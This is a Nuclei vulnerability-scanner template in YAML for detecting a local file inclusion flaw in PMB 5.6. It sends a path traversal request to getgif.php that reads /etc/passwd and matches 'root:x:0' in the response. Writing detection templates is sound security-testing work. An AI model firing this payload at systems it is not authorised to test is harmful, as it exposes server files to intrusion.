nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml

31 lines
696 B
YAML

id: pmb-local-file-disclosure
info:
name: PMB 5.6 - Local File Inclusion
author: dhiyaneshDk
description: PMB 5.6 is vulnerable to local file inclusion.
severity: high
reference:
- https://www.exploit-db.com/exploits/49054
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: lfi,pmb,edb
requests:
- method: GET
path:
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:x:0"
# Enhanced by mp on 2022/08/04